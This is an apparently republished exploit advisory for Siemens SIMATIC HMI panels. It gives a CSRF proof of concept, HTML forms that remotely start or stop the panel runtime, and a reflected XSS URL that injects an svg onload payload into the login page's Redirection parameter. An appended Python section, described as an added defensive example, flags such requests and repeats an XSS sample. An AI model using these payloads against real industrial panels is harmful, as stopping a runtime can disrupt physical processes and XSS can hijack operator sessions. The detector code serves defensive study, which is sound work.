Siemens SIMATIC Panels Cross Site Request Forgery / Cross Site Scripting

2018-05-19 / 2018-05-22
t4rkd3vilz (HK)
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Siemens SIMATIC Panels Multiple Vulnerability
# Date: 18.05.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.siemens.com/
# Version: Multiple SIMATIC Panels (TP, OP, MP, Mobile, Comfort)
# Greetz: Jameel Nabbo

CSRF PoC

<FORM METHOD="POST" ACTION="http://TargetIP/wwwSiemens">
<TD>
<INPUT TYPE="submit" VALUE="Start runtime" class="ad_button">
</TD>
<TD>
<INPUT TYPE="hidden" NAME="StartRt">
</TD>
</FORM>
</tr>
<tr>
<FORM METHOD="POST" ACTION="/wwwSiemens">
<TD>
<INPUT TYPE="submit" VALUE="Stop runtime" class="ad_button">
</TD>
<TD>
<INPUT TYPE="hidden" NAME="StopRt">
</TD>
</FORM>

And XSS PoC

http://TargetIP/Templates/Loginpage.html?Realm=FileBrowserUser&Redirection="/><svg/onload=prompt(/XSS/)>
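
A defensive check for the two request patterns in the PoCs above, as an added example (not part of the original advisory and not Siemens code): a function that a filtering reverse proxy or a log review script in front of a panel could use to flag cross-origin POSTs to /wwwSiemens carrying StartRt or StopRt, and Loginpage.html requests whose Redirection value is not a plain local path. The hostname panel.example, the function names and the sample requests are assumptions.

```python
from urllib.parse import urlsplit, parse_qs

PANEL_HOST = "panel.example"            # assumption: hostname the panel is reached by
STATE_CHANGING = {"StartRt", "StopRt"}  # hidden field names from the advisory's forms


def same_origin(header_value, host=PANEL_HOST):
    """True when an Origin or Referer value names the panel itself."""
    return bool(header_value) and urlsplit(header_value).hostname == host


def safe_redirection(value):
    """Allow only a plain local path: one leading '/', no markup, no scheme."""
    if not value.startswith("/") or value.startswith("//"):
        return False
    return "://" not in value and not any(c in value for c in "\"'<>\\")


def check_request(method, url, headers, body=""):
    """Return findings for one request; an empty list means nothing was flagged."""
    findings = []
    parts = urlsplit(url)
    if method.upper() == "POST" and parts.path == "/wwwSiemens":
        fields = set(parse_qs(body, keep_blank_values=True))
        # Strict on purpose: a POST with neither Origin nor Referer is flagged too.
        source = headers.get("Origin") or headers.get("Referer")
        if fields & STATE_CHANGING and not same_origin(source):
            findings.append("cross-origin runtime control POST")
    if parts.path == "/Templates/Loginpage.html":
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get("Redirection", []):
            if value and not safe_redirection(value):
                findings.append("unsafe Redirection parameter")
    return findings


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", "http://panel.example/wwwSiemens",
     {"Origin": "http://other.example"}, "StopRt="),
    ("POST", "http://panel.example/wwwSiemens",
     {"Referer": "http://panel.example/start.html"}, "StartRt="),
    ("GET", "http://panel.example/Templates/Loginpage.html"
            "?Realm=FileBrowserUser&Redirection=%22/%3E%3Csvg/onload=prompt(1)%3E", {}, ""),
]

if __name__ == "__main__":
    for method, url, headers, body in SAMPLES:
        print(method, url.split("?")[0], "->", check_request(method, url, headers, body) or "ok")
```

Header names are looked up exactly as "Origin" and "Referer", so normalise header case before calling check_request on real traffic.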


Copyright 2018, cxsecurity.com

 
